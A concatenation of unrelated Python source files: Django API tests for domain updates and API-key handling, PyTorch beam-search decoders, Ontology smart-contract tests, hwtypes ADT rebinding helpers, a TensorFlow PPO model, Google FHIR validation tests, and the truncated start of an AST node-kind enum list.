@classmethod
def setUpTestData(cls):
cls.user = UserFactory(password=PASSWORD)
cls.uri = reverse("api:graphql_domain_update_event")
cls.domain = DomainFactory(name="chrismaddalena.com")
cls.sample_data = {
"event": {
"data": {
"new": {
"expired": False,
"registrar": "Hover",
"note": "<p>The personal website and blog of <NAME></p>",
"last_health_check": "",
"auto_renew": True,
"expiration": "2023-03-25",
"reset_dns": False,
"vt_permalink": "",
"burned_explanation": "",
"creation": "2010-03-25",
"domain_status_id": cls.domain.domain_status.id,
"last_used_by_id": "",
"name": "Chrismaddalena.com",
"categorization": "",
"health_status_id": cls.domain.health_status.id,
"id": cls.domain.id,
"whois_status_id": 1,
"dns": {}
},
"old": {},
},
}
}
def setUp(self):
self.client = Client()
def test_graphql_domain_update_event(self):
response = self.client.post(
self.uri,
content_type="application/json",
data=self.sample_data,
**{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", },
)
self.assertEqual(response.status_code, 200)
self.domain.refresh_from_db()
self.assertEqual(self.domain.name, "chrismaddalena.com")
# Tests related to CBVs for :model:`api:APIKey`
class ApiKeyRevokeTests(TestCase):
"""Collection of tests for :view:`api:ApiKeyRevoke`."""
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(password=PASSWORD)
cls.other_user = UserFactory(password=PASSWORD)
cls.token_obj, cls.token = APIKey.objects.create_token(
user=cls.user, name="User's Token"
)
cls.other_token_obj, cls.other_token = APIKey.objects.create_token(
user=cls.other_user, name="Other User's Token"
)
cls.uri = reverse("api:ajax_revoke_token", kwargs={"pk": cls.token_obj.pk})
cls.other_uri = reverse("api:ajax_revoke_token", kwargs={"pk": cls.other_token_obj.pk})
def setUp(self):
self.client = Client()
self.client_auth = Client()
self.client_auth.login(username=self.user.username, password=PASSWORD)
self.assertTrue(
self.client_auth.login(username=self.user.username, password=PASSWORD)
)
def test_view_uri_exists_at_desired_location(self):
data = {"result": "success", "message": "Token successfully revoked!"}
response = self.client_auth.post(self.uri)
self.assertEqual(response.status_code, 200)
self.assertJSONEqual(force_str(response.content), data)
self.token_obj.refresh_from_db()
self.assertEqual(self.token_obj.revoked, True)
def test_view_requires_login(self):
response = self.client.get(self.uri)
self.assertEqual(response.status_code, 302)
def test_revoking_another_users_token(self):
response = self.client.post(self.other_uri)
self.assertEqual(response.status_code, 302)
class ApiKeyCreateTests(TestCase):
"""Collection of tests for :view:`api:ApiKeyCreate`."""
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(password=PASSWORD)
cls.uri = reverse("api:ajax_create_token")
cls.redirect_uri = reverse("users:user_detail", kwargs={"username": cls.user.username})
def setUp(self):
self.client = Client()
self.client_auth = Client()
self.client_auth.login(username=self.user.username, password=PASSWORD)
self.assertTrue(
self.client_auth.login(username=self.user.username, password=PASSWORD)
)
def test_view_uri_exists_at_desired_location(self):
response = self.client_auth.get(self.uri)
self.assertEqual(response.status_code, 200)
def test_view_requires_login(self):
response = self.client.get(self.uri)
self.assertEqual(response.status_code, 302)
def test_view_uses_correct_template(self):
response = self.client_auth.get(self.uri)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "token_form.html")
def test_custom_context_exists(self):
response = self.client_auth.get(self.uri)
self.assertIn("cancel_link", response.context)
self.assertEqual(response.context["cancel_link"], self.redirect_uri)
def test_post_data(self):
response = self.client_auth.post(self.uri, data={"name": "<NAME>", "expiry_date": datetime.now()})
self.assertRedirects(response, self.redirect_uri)
obj = APIKey.objects.get(name="CreateView Test")
self.assertEqual(obj.user, self.user)
|
<filename>models/utils.py
import torch
import torch.nn as nn
def roll_left(x, n=1):
return torch.cat([x[:, n:], x[:, :n]], 1)
def roll_right(x, n=1):
return torch.cat([x[:, -n:], x[:, :-n]], 1)
def shift_right(x, dim=1, n=1, fill="arithmetic"):
size = x.size()
pre_size, pos_size = size[:dim], size[dim + 1:]
if fill == "arithmetic":
pad = x[tuple(slice(None) for _ in pre_size) + (0, )]
pad = pad.unsqueeze(dim).expand(*pre_size, n, *pos_size)
elif fill == "roll":
pad = x[:, -n:]
elif fill == "zero":
pad = x.new(*pre_size, n, *pos_size).zero_()
else:
raise ValueError(f"unrecognized fill type: {fill}")
sx = x[tuple(slice(None) for _ in pre_size) + (slice(0, -n),)]
return torch.cat([pad, sx], dim)
def mask(lens, max_len=None):
if max_len is None:
max_len = lens.max().item()
enum = torch.range(0, max_len - 1).long()
enum = enum.to(lens.device)
enum_exp = enum.unsqueeze(0)
return lens.unsqueeze(1) > enum_exp
def chop(xs, dim=0):
return tuple(x.squeeze(dim) for x in torch.split(xs, 1, dim))
def embed_dot(emb, x):
x_size = x.size()
weight = emb.weight.t()
o = torch.mm(x.view(-1, x_size[-1]), weight)
return o.view(*x_size[:-1], -1)
class BeamSearchSequenceDecoder(object):
"""
To make my life a little easier, this beam-search decoder assumes
several things:
1) The model we are dealing with is an rnn-like model with the following
signature:
input float-tensor [batch_size, max_len, input_dim], \
(optional) lengths long-tensor [batch_size], \
(optional) initial hidden float-tensor [batch_size, hidden_dim] ->
hidden states float-tensor [batch_size, max_len, hidden_dim], \
cell states float-tensor [batch_size, max_len, hidden_dim], \
final-step hidden state float-tensor [batch_size, hidden_dim]
2) Encoding and decoding functions that map from discrete indices to
continuous representations and vice versa are provided with the following
signatures:
- encoder:
discrete indices long-tensor [batch_size, max_len] ->
latent rep. float-tensor [batch_size, max_len, input_dim]
- decoder:
latent rep. float-tensor [batch_size, max_len, hidden_dim] ->
prob. distribution long-tensor [batch_size, max_len, num_labels]
3) Assumes that bos and (optionally) eos labels are recognized by the
label vocabulary and the rnn model. These are necessary for initial
priming.
Inherit this class and implement relevant methods and call `decode` method.
"""
def __init__(self, bos, eos=None, maxlen=100, beam_size=3):
self.bos = bos
self.eos = eos
self.maxlen = maxlen
self.beam_size = beam_size
self.max_float = 1e10
self.min_float = -1e10
self.softmax = nn.Softmax(2)
def _rnn(self, w, lens=None, h=None):
raise NotImplementedError()
def _encode_discrete(self, w):
raise NotImplementedError()
def _decode_discrete(self, h):
raise NotImplementedError()
def decode(self, z):
batch_size = z.size(0)
# forces the beam searcher to search from the first index only
# in the beginning
x = z.new(batch_size, 1, 1).long().fill_(self.bos)
has_eos = x.new(batch_size, 1).zero_().byte()
probs = z.new(batch_size, 1).fill_(1.0)
lens = x.new(batch_size, 1).fill_(1).long()
while has_eos.prod().item() != 1 and lens.max() < self.maxlen:
cur_beamsize, seq_len = x.size(1), x.size(2)
x_emb = self._encode_discrete(x)
x_emb = x_emb.view(batch_size * cur_beamsize, seq_len, -1)
z_exp = z.unsqueeze(1).expand(batch_size, cur_beamsize, -1) \
.contiguous().view(batch_size * cur_beamsize, -1)
xo, _, _ = self._rnn(x_emb, lens.view(-1), z_exp)
xo = xo[:, -1].view(batch_size, cur_beamsize, -1)
logits = self._decode_discrete(xo)
# for beams that already generated <eos>, prevent probability
# depreciation.
if self.eos is not None:
eos_mask = has_eos.unsqueeze(-1).float()
logits_eos = torch.full_like(logits, self.min_float)
logits_eos[:, :, self.eos] = self.max_float
logits = logits * (1 - eos_mask) + logits_eos * eos_mask
# [batch_size x beam_size x vocab_size]
p_vocab = probs.unsqueeze(-1) * self.softmax(logits)
vocab_size = p_vocab.size(-1)
# utilize 2d-flattened-to-1d indices
probs, idx = torch.sort(p_vocab.view(batch_size, -1), 1, True)
probs, idx = \
probs[:, :self.beam_size], idx[:, :self.beam_size].long()
beam_idx, preds = idx / vocab_size, idx % vocab_size
x = torch.gather(x, 1,
beam_idx.unsqueeze(-1).expand(-1, -1, x.size(-1)))
x = torch.cat([x, preds.unsqueeze(-1)], 2)
if self.eos is not None:
has_eos = torch.gather(has_eos, 1, beam_idx)
has_eos = (preds == self.eos) | has_eos
lens = torch.gather(lens, 1, beam_idx)
lens += (1 - has_eos).long()
return x, lens + 1, probs
class BeamSearchDecoder(object):
def __init__(self, logprobs, lens=None, beam_size=5):
# [batch_size x max_len x num_labels] LongTensor
self.logprobs = logprobs
self.lens = lens
self.beam_size = beam_size
self.mask = None
if self.lens is not None:
self.mask = mask(lens, self.max_len)
@property
def batch_size(self):
return self.logprobs.size(0)
@property
def max_len(self):
return self.logprobs.size(1)
@property
def num_labels(self):
return self.logprobs.size(2)
def decode(self):
# [batch_size x 1 x 1] LongTensor
cum_logprobs, x = self.logprobs[:, 0].max(1)
x = x.unsqueeze(1).unsqueeze(1)
cum_logprobs = cum_logprobs.unsqueeze(1)
for t in range(1, self.max_len):
logprobs = self.logprobs[:, t]
new_logprobs = cum_logprobs.unsqueeze(-1) + logprobs.unsqueeze(1)
# utilize 2d-flattened-to-1d indices
new_logprobs_flat, idx_flat = \
torch.sort(new_logprobs.view(self.batch_size, -1), 1, True)
new_logprobs_flat, idx_flat = \
new_logprobs_flat[:, :self.beam_size], \
idx_flat[:, :self.beam_size]
beam_idx, preds = \
idx_flat / self.num_labels, idx_flat % self.num_labels
beam_idx_exp = beam_idx.unsqueeze(-1).expand(-1, -1, x.size(-1))
x_indexed = torch.gather(x, 1, beam_idx_exp)
x = torch.cat([x_indexed, preds.unsqueeze(-1)], 2)
# write-back original logprobs for out-of-length items
if self.mask is not None:
mask = self.mask[:, t].float()
old_logprobs = torch.gather(cum_logprobs, 1, beam_idx)
new_logprobs = new_logprobs_flat * mask.unsqueeze(-1) + \
old_logprobs * (1 - mask.unsqueeze(-1))
else:
new_logprobs = new_logprobs_flat
cum_logprobs = new_logprobs
return x, cum_logprobs |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import binascii
import os
import json
import time
import unittest
from ontology.ont_sdk import OntologySdk
from ontology.utils.contract_data_parser import ContractDataParser
from ontology.utils.contract_event_parser import ContractEventParser
from ontology.wallet.wallet_manager import WalletManager
from src.invoke_hello_ontology import InvokeHelloPython
ontology = OntologySdk()
remote_rpc_address = 'http://polaris3.ont.io:20336'
ontology.set_rpc(remote_rpc_address)
root_folder = os.path.dirname(os.path.dirname(__file__))
wallet_path = os.path.join(root_folder, 'wallet', 'wallet.json')
contracts_folder = os.path.join(root_folder, 'contracts')
hex_contract_address = '6fa374c57ea53680f5733d789a4f03b0ea45d82e'
gas_limit = 20000000
gas_price = 500
wallet_manager = WalletManager()
wallet_manager.open_wallet(wallet_path)
# password = input('password: ')
password = 'password'
acct = wallet_manager.get_account('<KEY>', password)
hello_ontology = InvokeHelloPython(ontology, hex_contract_address)
class TestHelloOntology(unittest.TestCase):
def test_name(self):
response = hello_ontology.name()
self.assertEqual('name', response)
def test_hello(self):
msg = 'ontology'
response = hello_ontology.hello(msg)
self.assertEqual(msg, response)
def test_test_hello(self):
bool_msg = True
int_msg = 1
bytes_msg = b'Hello'
str_msg = 'Hello'
address_msg = acct.get_address().to_bytes()
tx_hash = hello_ontology.test_hello(bool_msg, int_msg, bytes_msg, str_msg, address_msg, acct, gas_limit,
gas_price)
time.sleep(6)
event = ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash)
states = ContractEventParser.get_states_by_contract_address(event, hex_contract_address)
states[0] = ContractDataParser.to_utf8_str(states[0])
self.assertEqual('testHello', states[0])
states[1] = ContractDataParser.to_bool(states[1])
self.assertEqual(bool_msg, states[1])
states[2] = ContractDataParser.to_int(states[2])
self.assertEqual(int_msg, states[2])
states[3] = ContractDataParser.to_bytes(states[3])
self.assertEqual(bytes_msg, states[3])
states[4] = ContractDataParser.to_utf8_str(states[4])
self.assertEqual(str_msg, states[4])
states[5] = ContractDataParser.to_b58_address(states[5])
self.assertEqual(acct.get_address_base58(), states[5])
def test_test_list_and_str(self):
list_msg = [1, 2, 3]
tx_hash = hello_ontology.test_list(list_msg, acct, gas_limit, gas_price)
time.sleep(6)
event = ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash)
states = ContractEventParser.get_states_by_contract_address(event, hex_contract_address)
states[0] = ContractDataParser.to_utf8_str(states[0])
self.assertEqual('testMsgList', states[0])
states[1] = ContractDataParser.to_int_list(states[1])
self.assertEqual(list_msg, states[1])
def test_test_dict_pre_exec(self):
dict_msg = {'key': 'value'}
dict_value = hello_ontology.test_dict_pre_exec(dict_msg)
dict_value = ContractDataParser.to_utf8_str(dict_value)
self.assertEqual('value', dict_value)
def test_test_dict(self):
dict_msg = {'key': 'value'}
tx_hash = hello_ontology.test_dict(dict_msg, acct, gas_limit, gas_price)
self.assertEqual(64, len(tx_hash))
def test_test_get_dict(self):
key = 'key'
value = hello_ontology.test_get_dict(key)
value = ContractDataParser.to_utf8_str(value)
self.assertEqual('value', value)
def test_test_struct_list_and_str_pre_exec(self):
bool_msg = True
int_msg = 10
bytes_msg = b'Hello'
str_msg = 'Hello'
list_msg = [1, 10, 1024, [1, 10, 1024, [1, 10, 1024]]]
struct_list = [bool_msg, int_msg, bytes_msg, str_msg, list_msg]
value = hello_ontology.test_struct_list_and_str_pre_exec(struct_list, str_msg)
value[0][0] = ContractDataParser.to_bool(value[0][0])
self.assertEqual(bool_msg, value[0][0])
value[0][1] = ContractDataParser.to_int(value[0][1])
self.assertEqual(int_msg, value[0][1])
value[0][2] = ContractDataParser.to_bytes(value[0][2])
self.assertEqual(bytes_msg, value[0][2])
value[0][3] = ContractDataParser.to_utf8_str(value[0][3])
self.assertEqual(str_msg, value[0][3])
value[0][4] = ContractDataParser.to_int_list(value[0][4])
self.assertEqual(list_msg, value[0][4])
value[1] = ContractDataParser.to_utf8_str(value[1])
self.assertEqual(str_msg, value[1])
def test_test_struct_list_and_str(self):
bool_msg = True
int_msg = 10
bytes_msg = b'Hello'
str_msg = 'Hello'
list_msg = [1, 10, 1024, [1, 10, 1024, [1, 10, 1024]]]
struct_list = [bool_msg, int_msg, bytes_msg, str_msg, list_msg]
tx_hash = hello_ontology.test_struct_list_and_str(struct_list, str_msg, acct, gas_limit, gas_price)
time.sleep(6)
event = ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash)
states = ContractEventParser.get_states_by_contract_address(event, hex_contract_address)
states[0] = ContractDataParser.to_utf8_str(states[0])
states[1][0] = ContractDataParser.to_bool(states[1][0])
self.assertEqual(bool_msg, states[1][0])
states[1][1] = ContractDataParser.to_int(states[1][1])
self.assertEqual(int_msg, states[1][1])
states[1][2] = ContractDataParser.to_bytes(states[1][2])
self.assertEqual(bytes_msg, states[1][2])
states[1][3] = ContractDataParser.to_utf8_str(states[1][3])
self.assertEqual(str_msg, states[1][3])
states[1][4] = ContractDataParser.to_int_list(states[1][4])
self.assertEqual(list_msg, states[1][4])
states[2] = ContractDataParser.to_utf8_str(states[2])
def test_test_dict_in_ctx(self):
bool_value = True
int_value = 100
str_value = 'value3'
dict_value = {'key': 'value'}
list_value = [1, 10, 1024, [1, 10, 1024, [1, 10, 1024]]]
dict_msg = {'key': dict_value, 'key1': int_value, 'key2': str_value, 'key3': bool_value, 'key4': list_value}
tx_hash = hello_ontology.test_dict_in_ctx(dict_msg, acct, gas_limit, gas_price)
time.sleep(6)
event = ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash)
states = ContractEventParser.get_states_by_contract_address(event, hex_contract_address)
states[0] = ContractDataParser.to_utf8_str(states[0])
self.assertEqual('mapInfo', states[0])
states[1] = ContractDataParser.to_dict(states[1])
self.assertTrue(isinstance(states[1], dict))
def test_test_get_dict_in_ctx(self):
key = 'key'
value = hello_ontology.test_get_dict_in_ctx(key)
value = ContractDataParser.to_utf8_str(value)
self.assertEqual('value', value)
def test_test_transfer_multi(self):
bytes_address = acct.get_address().to_bytes()
transfer1 = [bytes_address, bytes_address, 1]
transfer2 = [bytes_address, bytes_address, 2]
transfer_list = [transfer1, transfer2]
tx_hash = hello_ontology.test_transfer_multi(transfer_list, acct, gas_limit, gas_price)
time.sleep(6)
event = ontology.rpc.get_smart_contract_event_by_tx_hash(tx_hash)
self.assertEqual(1, event['State'])
if __name__ == '__main__':
unittest.main()
|
from abc import ABCMeta, abstractmethod
from .adt_meta import BoundMeta
from .bit_vector_abc import AbstractBitVectorMeta, AbstractBitVector, AbstractBit
from .util import _issubclass
from hwtypes.modifiers import unwrap_modifier, wrap_modifier, is_modified
from .adt import Product, Sum, Tuple, Enum, TaggedUnion
from inspect import isclass
class _ADTVisitor(metaclass=ABCMeta):
def visit(self, adt_t):
# The order here is important because Product < Tuple
# and TaggedUnion < Sum
if self.check_t(adt_t, Enum):
self.visit_Enum(adt_t)
elif self.check_t(adt_t, Product):
self.visit_Product(adt_t)
elif self.check_t(adt_t, Tuple):
self.visit_Tuple(adt_t)
elif self.check_t(adt_t, TaggedUnion):
self.visit_TaggedUnion(adt_t)
elif self.check_t(adt_t, Sum):
self.visit_Sum(adt_t)
else:
self.visit_leaf(adt_t)
@abstractmethod
def check_t(self, adt_t): pass
@abstractmethod
def generic_visit(self, adt_t): pass
def visit_Leaf(self, adt_t): pass
def visit_Enum(self, adt_t): pass
def visit_Product(self, adt_t):
self.generic_visit(adt_t)
def visit_Tuple(self, adt_t):
self.generic_visit(adt_t)
def visit_TaggedUnion(self, adt_t):
self.generic_visit(adt_t)
def visit_Sum(self, adt_t):
self.generic_visit(adt_t)
class ADTVisitor(_ADTVisitor):
'''
Visitor for ADTs
'''
check_t = staticmethod(_issubclass)
def generic_visit(self, adt_t):
for T in adt_t.field_dict.values():
self.visit(T)
class ADTInstVisitor(_ADTVisitor):
'''
Visitor for ADT instances
'''
check_t = staticmethod(isinstance)
def generic_visit(self, adt):
for k, v in adt.value_dict.items():
if v is not None:
self.visit(v)
def rebind_bitvector(
adt,
bv_type_0: AbstractBitVectorMeta,
bv_type_1: AbstractBitVectorMeta,
keep_modifiers=False):
if keep_modifiers and is_modified(adt):
unmod, mods = unwrap_modifier(adt)
return wrap_modifier(rebind_bitvector(unmod,bv_type_0,bv_type_1,True),mods)
if _issubclass(adt, bv_type_0):
if adt.is_sized:
return bv_type_1[adt.size]
else:
return bv_type_1
elif isinstance(adt, BoundMeta):
_to_new = []
for field in adt.fields:
new_field = rebind_bitvector(field, bv_type_0, bv_type_1,keep_modifiers)
_to_new.append((field,new_field))
new_adt = adt
for field,new_field in _to_new:
new_adt = new_adt.rebind(field, new_field, rebind_recursive=False)
return new_adt
else:
return adt
def rebind_keep_modifiers(adt, A, B):
if is_modified(adt):
unmod, mods = unwrap_modifier(adt)
return wrap_modifier(rebind_keep_modifiers(unmod,A,B),mods)
if _issubclass(adt,A):
return B
elif isinstance(adt, BoundMeta):
new_adt = adt
for field in adt.fields:
new_field = rebind_keep_modifiers(field, A, B)
new_adt = new_adt.rebind(field, new_field)
return new_adt
else:
return adt
#rebind_type will rebind a type to a different family
#Types that will be rebinded:
# Product,Tuple,Sum, BitVector, Bit
# Modified types
#If the passed in type cannot be rebinded, it will just be returned unmodified
def rebind_type(T, family):
def _rebind_bv(T):
return rebind_bitvector(T, AbstractBitVector, family.BitVector).rebind(AbstractBit, family.Bit, True)
if not isclass(T):
return T
elif is_modified(T):
return get_modifier(T)(rebind_type(get_unmodified(T), family, dont_rebind, do_rebind, is_magma))
elif issubclass(T, AbstractBitVector):
return rebind_bitvector(T, AbstractBitVector, family.BitVector)
elif issubclass(T, AbstractBit):
return family.Bit
elif issubclass(T, (Product, Tuple, Sum)):
return _rebind_bv(T)
else:
return T
|
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import time
import numpy as np
import tensorflow as tf
from xt.model.tf_compat import K, Conv2D, Dense, \
Flatten, Input, Lambda, Model, Activation
from xt.model.ppo.ppo_cnn_tf import PPOCnnTf, layer_function
from xt.model.ppo.default_config import LR, LOSS_CLIPPING, ENTROPY_LOSS, BATCH_SIZE
from xt.util.common import import_config
from xt.framework.register import Registers
@Registers.model
class PPOCnnTfSmall(PPOCnnTf):
"""docstring for ActorNetwork."""
def __init__(self, model_info):
model_config = model_info.get('model_config', None)
import_config(globals(), model_config)
self.state_dim = model_info['state_dim']
self.action_dim = model_info['action_dim']
super().__init__(model_info)
def create_model(self, model_info):
state_input = Input(shape=self.state_dim, name='state_input', dtype='uint8')
#state_input_1 = Lambda(lambda x: K.cast(x, dtype='float32') / 255.)(state_input)
state_input_1 = Lambda(layer_function)(state_input)
# convlayer = Conv2D(16, (8, 8), strides=(4, 4), activation='relu', padding='same')(state_input_1)
# convlayer = Conv2D(32, (4, 4), strides=(2, 2), activation='relu', padding='same')(convlayer)
# # print(convlayer)
# convlayer = Conv2D(256, (11, 11), strides=(1, 1), activation='relu', padding='valid')(convlayer)
#
# policy_conv = Conv2D(self.action_dim, (1, 1), strides=(1, 1), activation='relu', padding='valid')(convlayer)
# flattenlayer = Flatten()(policy_conv)
# out_actions = Activation(activation='softmax', name='output_actions_raw')(flattenlayer)
# flattenlayer = Flatten()(convlayer)
# out_value = Dense(1, name='output_value')(flattenlayer)
convlayer = Conv2D(32, (8, 8), strides=(4, 4), activation='relu', padding='valid')(state_input_1)
convlayer = Conv2D(32, (4, 4), strides=(2, 2), activation='relu', padding='valid')(convlayer)
convlayer = Conv2D(64, (3, 3), strides=(1, 1), activation='relu', padding='valid')(convlayer)
flattenlayer = Flatten()(convlayer)
denselayer = Dense(256, activation='relu', name='dense_1')(flattenlayer)
out_actions = Dense(self.action_dim, activation='softmax', name='output_actions_raw')(denselayer)
out_value = Dense(1, name='output_value')(denselayer)
model = Model(inputs=[state_input], outputs=[out_actions, out_value])
self.build_graph(np.uint8, model)
return model
def build_graph(self, intput_type, model):
# pylint: disable=W0201
self.infer_state = tf.placeholder(intput_type, name="infer_input",
shape=(None, ) + tuple(self.state_dim))
self.state = tf.placeholder(intput_type, name="input",
shape=(None, ) + tuple(self.state_dim))
self.adv = tf.placeholder(tf.float32, name="adv",
shape=(None, 1))
self.old_p = tf.placeholder(tf.float32, name="old_p",
shape=(None, self.action_dim))
self.old_v = tf.placeholder(tf.float32, name="old_v",
shape=(None, 1))
self.out_p, self.out_v = model(self.state)
self.infer_p, self.infer_v = model(self.infer_state)
self.target_v = tf.placeholder(tf.float32, name="target_value",
shape=(None, 1))
self.target_p = tf.placeholder(tf.float32, name="target_policy",
shape=(None, self.action_dim))
loss = 0.5 * value_loss(self.target_v, self.out_v, self.old_v)
loss += ppo_loss(self.adv, self.old_p, self.target_p, self.out_p)
self.loss = loss
# self.optimizer = tf.train.AdamOptimizer(LR)
# self.train_op = self.optimizer.minimize(loss)
self.trainer = tf.train.AdamOptimizer(learning_rate=LR, epsilon=1e-5)
# 3. Calculate the gradients
grads_and_var = self.trainer.compute_gradients(loss)
grads, var = zip(*grads_and_var)
max_grad_norm = 0.5
grads, _grad_norm = tf.clip_by_global_norm(grads, max_grad_norm)
grads_and_var = list(zip(grads, var))
self.train_op = self.trainer.apply_gradients(grads_and_var)
self.sess.run(tf.initialize_all_variables())
def train(self, state, label):
with self.graph.as_default():
K.set_session(self.sess)
nbatch_train = BATCH_SIZE
nbatch = max((state[0].shape[0] // nbatch_train) * nbatch_train, 1)
inds = np.arange(nbatch)
loss_val = []
start_time = time.time()
for _ in range(4):
# Randomize the indexes
np.random.shuffle(inds)
# 0 to batch_size with batch_train_size step
for start in range(0, nbatch, nbatch_train):
end = start + nbatch_train
mbinds = inds[start:end]
feed_dict = {self.state: state[0][mbinds],
self.adv: state[1][mbinds],
self.old_p: state[2][mbinds],
self.old_v: state[3][mbinds],
self.target_p: label[0][mbinds],
self.target_v: label[1][mbinds],}
ret_value = self.sess.run([self.train_op, self.loss], feed_dict)
loss_val.append(np.mean(ret_value[1]))
return np.mean(loss_val)
def predict(self, state):
"""
Do predict use the newest model.
:param state:
:return:
"""
with self.graph.as_default():
K.set_session(self.sess)
feed_dict = {self.infer_state: state}
return self.sess.run([self.infer_p, self.infer_v], feed_dict)
def value_loss(target_v, out_v, old_v):
vpredclipped = old_v + tf.clip_by_value(out_v - old_v, -LOSS_CLIPPING, LOSS_CLIPPING)
# Unclipped value
vf_losses1 = tf.square(out_v - target_v)
# Clipped value
vf_losses2 = tf.square(vpredclipped - target_v)
vf_loss = .5 * tf.reduce_mean(tf.maximum(vf_losses1, vf_losses2))
return vf_loss
def ppo_loss(adv, old_p, target_p, out_p):
"""loss for ppo"""
neglogpac = -target_p * tf.log(out_p + 1e-10)
old_neglog = -target_p * tf.log(old_p + 1e-10)
ratio = tf.exp(old_neglog - neglogpac)
pg_losses = -adv * ratio
pg_losses2 = -adv * tf.clip_by_value(ratio, 1.0 - LOSS_CLIPPING, 1.0 + LOSS_CLIPPING)
pg_loss = tf.reduce_mean(tf.maximum(pg_losses, pg_losses2))
entropy = tf.reduce_mean(-out_p * tf.log(out_p + 1e-10))
return pg_loss - ENTROPY_LOSS * entropy
|
<reponame>swrobel/fhir<filename>py/google/fhir/r4/resource_validation_test.py
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test resource validation functionality."""
import os
from typing import Type
from google.protobuf import message
from absl.testing import absltest
from proto.google.fhir.proto.r4.core.resources import bundle_and_contained_resource_pb2
from proto.google.fhir.proto.r4.core.resources import encounter_pb2
from proto.google.fhir.proto.r4.core.resources import observation_pb2
from google.fhir import fhir_errors
from google.fhir.r4 import resource_validation
from google.fhir.testing import testdata_utils
_VALIDATION_DIR = os.path.join('testdata', 'r4', 'validation')
class ResourceValidationTest(absltest.TestCase):
"""Basic unit test suite ensuring that resource validation works correctly."""
def testResourceValidation_withMissingRequiredField_raises(self):
self._invalid_test('observation_invalid_missing_required',
observation_pb2.Observation)
def testResourceValidation_withInvalidPrimitive_raises(self):
self._invalid_test('observation_invalid_primitive',
observation_pb2.Observation)
def testResourceValidation_withValidReference_succeeds(self):
self._valid_test('observation_valid_reference', observation_pb2.Observation)
def testResourceValidation_withInvalidReference_raises(self):
self._invalid_test('observation_invalid_reference',
observation_pb2.Observation)
# TODO: Implement FHIR-Path validation for Python API
# def testResourceValidation_withFhirPathViolation_raises(self):
# self._invalid_test('observation_invalid_fhirpath_violation',
# observation_pb2.Observation)
def testResourceValidation_withValidRepeatedReference_succeeds(self):
self._valid_test('encounter_valid_repeated_reference',
encounter_pb2.Encounter)
def testResourceValidation_withInvalidRepeatedReference_raies(self):
self._invalid_test('encounter_invalid_repeated_reference',
encounter_pb2.Encounter)
def testResourceValidation_withInvalidEmptyOneof_Raises(self):
self._invalid_test('observation_invalid_empty_oneof',
observation_pb2.Observation)
def testResourceValidation_withValidBundle_succeeds(self):
self._valid_test('bundle_valid', bundle_and_contained_resource_pb2.Bundle)
def testResourceValidation_withStartLaterThanEnd_raises(self):
self._invalid_test('encounter_invalid_start_later_than_end',
encounter_pb2.Encounter)
def testResourceValidation_withStartLaterThanEndWithEndPrecision_succeeds(
self):
self._valid_test('encounter_valid_start_later_than_end_day_precision',
encounter_pb2.Encounter)
def testResourceValidation_withValidEncounter_succeeds(self):
self._valid_test('encounter_valid', encounter_pb2.Encounter)
def testResourceValidation_withValidNumericTimezone_succeeds(self):
self._valid_test('encounter_valid_numeric_timezone',
encounter_pb2.Encounter)
def _valid_test(self, name: str, message_cls: Type[message.Message]) -> None:
msg = testdata_utils.read_protos(
os.path.join(_VALIDATION_DIR, name + '.prototxt'), message_cls)[0]
resource_validation.validate_resource(msg)
def _invalid_test(self, name: str,
message_cls: Type[message.Message]) -> None:
msg = testdata_utils.read_protos(
os.path.join(_VALIDATION_DIR, name + '.prototxt'), message_cls)[0]
with self.assertRaises(fhir_errors.InvalidFhirError) as fe:
resource_validation.validate_resource(msg)
self.assertIsInstance(fe.exception, fhir_errors.InvalidFhirError)
if __name__ == '__main__':
absltest.main()
|
from enum import IntEnum, auto
from typing import Tuple
__all__ = [
'NodeKind',
'NK_NONE',
'NK_BOOL_EXPR',
'NK_INT8_EXPR',
'NK_INT16_EXPR',
'NK_INT32_EXPR',
'NK_INT64_EXPR',
'NK_UINT8_EXPR',
'NK_UINT16_EXPR',
'NK_UINT32_EXPR',
'NK_UINT64_EXPR',
'NK_FLOAT16_EXPR',
'NK_FLOAT32_EXPR',
'NK_FLOAT64_EXPR',
'NK_FLOAT80_EXPR',
'NK_NULL_EXPR',
'NK_UNDEFINED_EXPR',
'NK_FUNCTION_EXPR',
'NK_FCALL_EXPR',
'NK_VAR_EXPR',
'NK_CONSTANT_EXPR',
'NK_ENUMERATION_EXPR',
'NK_CONSTEXPR_EXPR',
'NK_PARAM_EXPR',
'NK_OPERAND_EXPR',
'NK_UNARY_EXPR',
'NK_INC_EXPR',
'NK_DEC_EXPR',
'NK_BINARY_EXPR',
'NK_TERNARY_EXPR',
'NK_LOGIC_EXPR',
